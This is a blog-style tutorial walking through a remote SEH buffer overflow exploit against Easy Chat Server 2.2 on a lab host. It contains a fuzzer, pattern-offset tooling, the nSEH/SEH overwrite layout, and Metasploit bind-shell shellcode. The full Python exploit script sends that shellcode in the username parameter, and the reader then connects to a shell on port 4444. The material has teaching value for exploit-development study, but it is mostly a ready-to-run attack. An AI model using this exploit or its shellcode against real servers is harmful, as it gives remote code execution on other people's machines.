=======================================================

Monday, October 8, 2012

BUFFER OVERFLOW ( remote ) SEH: Easy Chat Server 2.2

Okay, this time I fuzz Easy Chat Server 2.2 remotely over the network. The steps:

1. Observe the Easy Chat Server application.

     ==> Registration form.
     ==> IP and ports in use ==> 192.168.56.101:80/443
     ==> Users that have already been created.
     ==> Chat rooms and their rules.
     ==> Accessed by IP address 192.168.56.101 (default HTTP port 80).
     ==> Enter the first chat room ==> only this room allows a guest user to log in.

   ** Look at the URL for a clue:  http://192.168.56.101/chat.ghp?username=guest&password=&room=1&sex=1

2. Find the request header to build the fuzzer from.
     ==> Capture traffic with Wireshark.
     ==> Log in as guest and analyse the captured traffic in Wireshark.
     ==> The request line matches the URL above:
           GET /chat.ghp?username=guest&password=&room=1&sex=1 HTTP/1.1

     ==> Create the fuzzer from the header above (the username and password parameters are the ones being fuzzed).

#!/usr/bin/env python3
import socket

target_address = "192.168.56.101"
target_port = 80

# 5000 x "A" (0x41) in both parameters: a crash with 41414141 in the SEH
# chain shows that the exception handler pointer gets overwritten.
buffer = b"\x41" * 5000
payload = (b"GET /chat.ghp?username=" + buffer + b"&password=" + buffer
           + b"&room=1 HTTP/1.1\r\n\r\n")

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(payload)
print("sent")
sock.close()


3. Run the fuzzer and watch the impact in OllyDbg.

   ==> The SEH chain contains 41414141: the exception handler pointer is overwritten.
   ==> Pass the exception to the program (Shift + F9) and the overwritten handler is called:
   ==> EIP is overwritten with 41414141.

 4. Create a cyclic pattern to find the offset.

     ==> Run the fuzzer again with the pattern in place of the "A"s.
     ==> EIP is overwritten with 68413368.
     ==> Look up that value in the pattern to get the offset.
     ==> Pattern offset position ==> 220 (this is where the SEH handler pointer sits; nSEH is the 4 bytes just before it, at 216).
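The offset lookup in step 4 is easy to reproduce without the Metasploit tools. The following is an added example (not the post's own script) that generates the same Aa0Aa1... cyclic pattern and maps a register value as printed by OllyDbg back to its offset; it assumes the 5000-byte pattern length the fuzzer used and checks that the post's value 68413368 really resolves to 220.

```python
#!/usr/bin/env python3
"""Cyclic pattern generator and offset finder, in the style of Metasploit's
pattern_create / pattern_offset.  Added example, not part of the original post.

The pattern is built from triples (Uppercase, lowercase, digit), so every
4-byte window is unique within the first 26*26*10*3 = 20280 bytes."""
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Return `length` bytes of the cyclic pattern: b"Aa0Aa1Aa2...Ab0Ab1..."."""
    out = bytearray()
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out += (u + lo + d).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("a pattern longer than %d bytes is no longer unique" % len(out))


def pattern_offset(value, length=5000):
    """Map a 4-byte value back to its offset in the pattern.

    `value` may be the hex string OllyDbg shows ("68413368"), an int, or the raw
    4-byte fragment (b"h3Ah").  Register values are little-endian, so the int is
    packed with "<I" to recover the bytes as they sat in memory.
    Returns -1 when the value does not come from the pattern."""
    if isinstance(value, str):
        value = int(value, 16)
    if isinstance(value, int):
        needle = struct.pack("<I", value)
    else:
        needle = bytes(value)
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    # Value the post reports in EIP after sending the pattern.
    print(pattern_offset("68413368"))
```

0x68413368 packed little-endian is the fragment b"h3Ah"; the first triple whose lowercase letter is "h" and digit is "3" is "Ah3" at byte 219, so the "h" of "h3Ah" lands at 220, matching the post. Feeding an all-"A" crash value (41414141) returns -1, which is how you tell a pattern hit from a plain padding hit.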

 5. Look for a third-party .dll module to get a POP POP RETN.

     ==> Easy Chat ships two modules that can be used: libeay32.dll or ssleay32.dll.
     ==> I use ssleay32.dll because the address does not contain a 00 byte (the module must also not be compiled with SafeSEH, or the handler address will be rejected before it runs).

    ==> POP POP RETN address ==> 10013814 ==> \x14\x38\x01\x10 (little-endian)
    ==> nSEH ==> \xeb\x08\x90\x90 (JMP SHORT +8: run from nSEH it skips the two padding NOPs and the 4-byte handler address and lands in the NOP sled that follows)

    ==> Note: the scripts below use \x58\x07\x01\x10 (10010758), a different address in the same module. Take the address from your own copy of ssleay32.dll in the debugger and confirm it really is a POP POP RETN sequence before relying on it.

 6. Modify the fuzzer with the structure: nop + nSEH + SEH

#!/usr/bin/env python3
import socket

target_address = "192.168.56.101"
target_port = 80

# Layout: 216 bytes of NOP padding, nSEH at offset 216, SEH handler at offset 220
# (the pattern offset found above), then a NOP sled.
buffer = b"\x90" * 216
buffer += b"\xeb\x08\x90\x90"      # nSEH: jmp short +8 over the handler address, padded with two NOPs
buffer += b"\x58\x07\x01\x10"      # SEH: POP POP RETN in ssleay32.dll (0x10010758, little-endian)
buffer += b"\x90" * 500            # NOP sled the short jump lands in
buffer += b"\x90" * (2000 - len(buffer))   # pad to a fixed 2000-byte request
#buffer += b"\xCC\xCC\xCC\xCC"     # INT3 breakpoints, to confirm where execution lands
#buffer += b"\x6D\x1D\x90\x7C"

payload = (b"GET /chat.ghp?username=" + buffer
           + b"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(payload)
print("sent")
sock.close()







==> Result: success ==> the POP POP RETN from ssleay32.dll is executed and control reaches the NOP sled.



    

 7. Generate shellcode with msfweb.
     ==> Bad char ==> \x20 (space). The payload travels inside a URL query string, so 0x00, 0x0d and 0x0a are normally unusable as well; check the generated bytes for all of them before sending.

     ==> Generate payload (win32_bind, EXITFUNC=seh, LPORT=4444, Size=344, Encoder=PexFnstenvSub):

/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x64"
"\xd5\xde\xe8\x83\xeb\xfc\xe2\xf4\x98\xbf\x35\xa5\x8c\x2c\x21\x17"
"\x9b\xb5\x55\x84\x40\xf1\x55\xad\x58\x5e\xa2\xed\x1c\xd4\x31\x63"
"\x2b\xcd\x55\xb7\x44\xd4\x35\xa1\xef\xe1\x55\xe9\x8a\xe4\x1e\x71"
"\xc8\x51\x1e\x9c\x63\x14\x14\xe5\x65\x17\x35\x1c\x5f\x81\xfa\xc0"
"\x11\x30\x55\xb7\x40\xd4\x35\x8e\xef\xd9\x95\x63\x3b\xc9\xdf\x03"
"\x67\xf9\x55\x61\x08\xf1\xc2\x89\xa7\xe4\x05\x8c\xef\x96\xee\x63"
"\x24\xd9\x55\x98\x78\x78\x55\xa8\x6c\x8b\xb6\x66\x2a\xdb\x32\xb8"
"\x9b\x03\xb8\xbb\x02\xbd\xed\xda\x0c\xa2\xad\xda\x3b\x81\x21\x38"
"\x0c\x1e\x33\x14\x5f\x85\x21\x3e\x3b\x5c\x3b\x8e\xe5\x38\xd6\xea"
"\x31\xbf\xdc\x17\xb4\xbd\x07\xe1\x91\x78\x89\x17\xb2\x86\x8d\xbb"
"\x37\x86\x9d\xbb\x27\x86\x21\x38\x02\xbd\xcf\xb4\x02\x86\x57\x09"
"\xf1\xbd\x7a\xf2\x14\x12\x89\x17\xb2\xbf\xce\xb9\x31\x2a\x0e\x80"
"\xc0\x78\xf0\x01\x33\x2a\x08\xbb\x31\x2a\x0e\x80\x81\x9c\x58\xa1"
"\x33\x2a\x08\xb8\x30\x81\x8b\x17\xb4\x46\xb6\x0f\x1d\x13\xa7\xbf"
"\x9b\x03\x8b\x17\xb4\xb3\xb4\x8c\x02\xbd\xbd\x85\xed\x30\xb4\xb8"
"\x3d\xfc\x12\x61\x83\xbf\x9a\x61\x86\xe4\x1e\x1b\xce\x2b\x9c\xc5"
"\x9a\x97\xf2\x7b\xe9\xaf\xe6\x43\xcf\x7e\xb6\x9a\x9a\x66\xc8\x17"
"\x11\x91\x21\x3e\x3f\x82\x8c\xb9\x35\x84\xb4\xe9\x35\x84\x8b\xb9"
"\x9b\x05\xb6\x45\xbd\xd0\x10\xbb\x9b\x03\xb4\x17\x9b\xe2\x21\x38"
"\xef\x82\x22\x6b\xa0\xb1\x21\x3e\x36\x2a\x0e\x80\x94\x5f\xda\xb7"
"\x37\x2a\x08\x17\xb4\xd5\xde\xe8";

     ==> Note: the script in step 8 does not embed these bytes; it carries a different encoding of the same bind shell (a short GetPC stub followed by mostly alphanumeric bytes). Whichever encoding is used, it must avoid the bad chars listed above.




 8. Modify the fuzzer with the structure: nop + nSEH + SEH + nop + shellcode

#!/usr/bin/env python3
import socket

target_address = "192.168.56.101"
target_port = 80

# Layout: 216 bytes of NOP padding, nSEH at 216, SEH handler at 220,
# a 500-byte NOP sled, the bind shell, then padding to 2000 bytes.
buffer = b"\x90" * 216
buffer += b"\xeb\x08\x90\x90"      # nSEH: jmp short +8 into the NOP sled
buffer += b"\x58\x07\x01\x10"      # SEH: POP POP RETN in ssleay32.dll (0x10010758)
buffer += b"\x90" * 500            # NOP sled
# win32_bind shell on port 4444 (GetPC stub followed by the encoded payload)
buffer += (b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
b"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
b"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x57\x32\x41\x42\x32\x42\x42"
b"\x30\x42\x42\x42\x41\x58\x50\x38\x41\x42\x75\x5a\x49\x6b\x4c\x61"
b"\x7a\x4a\x4b\x70\x4d\x4d\x38\x4a\x59\x6b\x4f\x4b\x4f\x69\x6f\x51"
b"\x70\x4c\x4b\x70\x6c\x74\x64\x54\x64\x4e\x6b\x77\x35\x67\x4c\x4c"
b"\x4b\x33\x4c\x37\x75\x62\x58\x35\x51\x6a\x4f\x6c\x4b\x50\x4f\x55"
b"\x48\x4e\x6b\x51\x4f\x77\x50\x66\x61\x7a\x4b\x71\x59\x6e\x6b\x50"
b"\x34\x6c\x4b\x65\x51\x7a\x4e\x44\x71\x6b\x70\x4f\x69\x6c\x6c\x4e"
b"\x64\x79\x50\x43\x44\x53\x37\x49\x51\x6b\x7a\x56\x6d\x36\x61\x4f"
b"\x32\x4a\x4b\x5a\x54\x37\x4b\x46\x34\x46\x44\x71\x38\x42\x55\x69"
b"\x75\x4e\x6b\x41\x4f\x57\x54\x53\x31\x7a\x4b\x71\x76\x6c\x4b\x76"
b"\x6c\x30\x4b\x4e\x6b\x41\x4f\x57\x6c\x74\x41\x7a\x4b\x35\x53\x66"
b"\x4c\x6e\x6b\x4d\x59\x70\x6c\x64\x64\x65\x4c\x73\x51\x49\x53\x70"
b"\x31\x6b\x6b\x75\x34\x4e\x6b\x37\x33\x30\x30\x6c\x4b\x37\x30\x44"
b"\x4c\x4c\x4b\x30\x70\x37\x6c\x6c\x6d\x6e\x6b\x51\x50\x53\x38\x63"
b"\x6e\x63\x58\x4c\x4e\x62\x6e\x76\x6e\x7a\x4c\x72\x70\x39\x6f\x4e"
b"\x36\x61\x76\x36\x33\x43\x56\x61\x78\x45\x63\x30\x32\x51\x78\x44"
b"\x37\x70\x73\x64\x72\x33\x6f\x66\x34\x39\x6f\x68\x50\x45\x38\x68"
b"\x4b\x58\x6d\x59\x6c\x35\x6b\x36\x30\x6b\x4f\x78\x56\x73\x6f\x6f"
b"\x79\x49\x75\x52\x46\x4c\x41\x38\x6d\x45\x58\x56\x62\x30\x55\x51"
b"\x7a\x77\x72\x69\x6f\x4a\x70\x35\x38\x6b\x69\x77\x79\x49\x65\x6e"
b"\x4d\x73\x67\x4b\x4f\x59\x46\x71\x43\x36\x33\x36\x33\x70\x53\x56"
b"\x33\x50\x43\x72\x73\x43\x73\x33\x63\x79\x6f\x5a\x70\x62\x46\x73"
b"\x58\x64\x51\x63\x6c\x55\x36\x42\x73\x6c\x49\x4b\x51\x6e\x75\x30"
b"\x68\x6c\x64\x46\x7a\x42\x50\x6f\x37\x32\x77\x79\x6f\x7a\x76\x31"
b"\x7a\x52\x30\x43\x61\x61\x45\x6b\x4f\x6e\x30\x35\x38\x6e\x44\x4c"
b"\x6d\x74\x6e\x6d\x39\x36\x37\x6b\x4f\x4b\x66\x61\x43\x42\x75\x4b"
b"\x4f\x58\x50\x75\x38\x4d\x35\x70\x49\x6c\x46\x50\x49\x53\x67\x4b"
b"\x4f\x6a\x76\x46\x30\x53\x64\x62\x74\x61\x45\x6b\x4f\x4a\x70\x6f"
b"\x63\x45\x38\x6b\x57\x32\x59\x59\x56\x61\x69\x73\x67\x79\x6f\x6b"
b"\x66\x31\x45\x49\x6f\x38\x50\x52\x46\x52\x4a\x61\x74\x65\x36\x62"
b"\x48\x51\x73\x50\x6d\x6f\x79\x6a\x45\x51\x7a\x76\x30\x42\x79\x77"
b"\x59\x5a\x6c\x6f\x79\x68\x67\x73\x5a\x42\x64\x6c\x49\x4a\x42\x50"
b"\x31\x6f\x30\x4b\x43\x4e\x4a\x4b\x4e\x61\x52\x56\x4d\x59\x6e\x30"
b"\x42\x66\x4c\x4c\x53\x4e\x6d\x31\x6a\x50\x38\x6e\x4b\x6e\x4b\x6c"
b"\x6b\x45\x38\x31\x62\x79\x6e\x4f\x43\x55\x46\x49\x6f\x72\x55\x52"
b"\x64\x59\x6f\x78\x56\x33\x6b\x72\x77\x43\x62\x36\x31\x72\x71\x61"
b"\x41\x62\x4a\x43\x31\x66\x31\x46\x31\x63\x65\x70\x51\x6b\x4f\x6a"
b"\x70\x33\x58\x6c\x6d\x79\x49\x63\x35\x4a\x6e\x43\x63\x4b\x4f\x6e"
b"\x36\x41\x7a\x39\x6f\x59\x6f\x30\x37\x79\x6f\x6e\x30\x4c\x4b\x70"
b"\x57\x6b\x4c\x6c\x43\x48\x44\x71\x74\x39\x6f\x48\x56\x63\x62\x49"
b"\x6f\x5a\x70\x71\x78\x6a\x50\x4c\x4a\x76\x64\x53\x6f\x73\x63\x6b"
b"\x4f\x79\x46\x4b\x4f\x48\x50\x47")
buffer += b"\x90" * (2000 - len(buffer))   # pad to a fixed 2000-byte request
#buffer += b"\xCC\xCC\xCC\xCC"     # INT3 breakpoints, to confirm where execution lands
#buffer += b"\x6D\x1D\x90\x7C"

payload = (b"GET /chat.ghp?username=" + buffer
           + b"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(payload)
print("sent")
sock.close()
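Steps 5 to 8 all depend on the same few invariants: the handler address must be free of bad chars, the short jump at nSEH must land inside the NOP sled, and the whole thing must fit in the fixed-size request. The following added example (not the post's own script) builds the layout from the offset and handler address and checks those invariants before anything is sent. It assumes offset 220, the handler address the scripts use (0x10010758 in ssleay32.dll), and four INT3 bytes standing in for the bind shell so it runs offline; the bad-char list extends the post's 0x20 with bytes that end an HTTP request line or are special in a query string, which is an assumption rather than something the post measured.

```python
#!/usr/bin/env python3
"""Build and sanity-check the SEH overwrite layout used in the post:

    [NOP x 216][nSEH: jmp short +8][SEH: POP POP RETN][NOP x 500][shellcode][pad to 2000]

Added example, not the post's own script.  Assumptions: offset 220 (from the
pattern step), the handler 0x10010758 the post's scripts use, and INT3s in
place of the bind shell."""
import struct

# Bytes the request must not contain.  The post lists 0x20; the rest are a
# conservative assumption: 0x00 ends a C string, 0x0d/0x0a end the HTTP
# request line, and the others are special inside a query string.
BAD_CHARS = b"\x00\x0a\x0d\x20&=?#%+"


def jmp_short(rel8):
    """EB rel8: 2-byte short jump, rel8 relative to the end of the jmp itself."""
    if not -128 <= rel8 <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", rel8)


def handler_bytes_ok(addr):
    """True if the little-endian handler address contains no bad char."""
    return not any(b in BAD_CHARS for b in struct.pack("<I", addr))


def build_buffer(seh_offset, handler, shellcode, total=2000, sled=500):
    """Return (buffer, layout); layout maps each part to its byte offset."""
    if not handler_bytes_ok(handler):
        raise ValueError("handler address contains a bad char")
    nseh_off = seh_offset - 4
    buf = b"\x90" * nseh_off
    buf += jmp_short(8) + b"\x90\x90"        # nSEH: 2-byte jmp padded to 4
    buf += struct.pack("<I", handler)        # SEH: POP POP RETN, little-endian
    buf += b"\x90" * sled                    # sled the short jump lands in
    buf += shellcode
    if len(buf) > total:
        raise ValueError("payload of %d bytes does not fit in %d" % (len(buf), total))
    buf += b"\x90" * (total - len(buf))
    layout = {"nseh": nseh_off, "seh": seh_offset,
              "sled": seh_offset + 4, "shellcode": seh_offset + 4 + sled}
    return buf, layout


def jmp_target(buf, layout):
    """Offset the short jump at nSEH lands on: rel8 is applied to nSEH + 2."""
    rel8 = struct.unpack("<b", buf[layout["nseh"] + 1:layout["nseh"] + 2])[0]
    return layout["nseh"] + 2 + rel8


def check_buffer(buf, layout):
    """Return a list of problems; an empty list means the layout is consistent."""
    problems = []
    bad = sorted({b for b in buf if b in BAD_CHARS})
    if bad:
        problems.append("bad chars present: " + " ".join("%#04x" % b for b in bad))
    target = jmp_target(buf, layout)
    if not layout["sled"] <= target < layout["shellcode"]:
        problems.append("jmp short lands at %d, outside the NOP sled" % target)
    return problems


def build_request(buf):
    """Wrap the buffer in the same GET request the post's scripts send."""
    return (b"GET /chat.ghp?username=" + buf
            + b"&password=123&room=1 HTTP/1.1\r\n\r\n")


if __name__ == "__main__":
    buf, layout = build_buffer(220, 0x10010758, b"\xcc" * 4)   # INT3 stand-in
    print(layout, "jmp lands at", jmp_target(buf, layout))
    print("problems:", check_buffer(buf, layout) or "none")
    print("request is %d bytes" % len(build_request(buf)))
```

With the post's numbers the jump at 216 lands at 226, two bytes into the sled that starts at 224, and both handler addresses the post mentions (0x10013814 and 0x10010758) pass the bad-char check. Swapping in the real shellcode is a one-line change; if check_buffer then reports a bad char, re-encode the payload rather than sending it and guessing why the shell never comes back.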


 9. Run the exploit, then connect with telnet to port 4444 (the port the bind shell listens on).



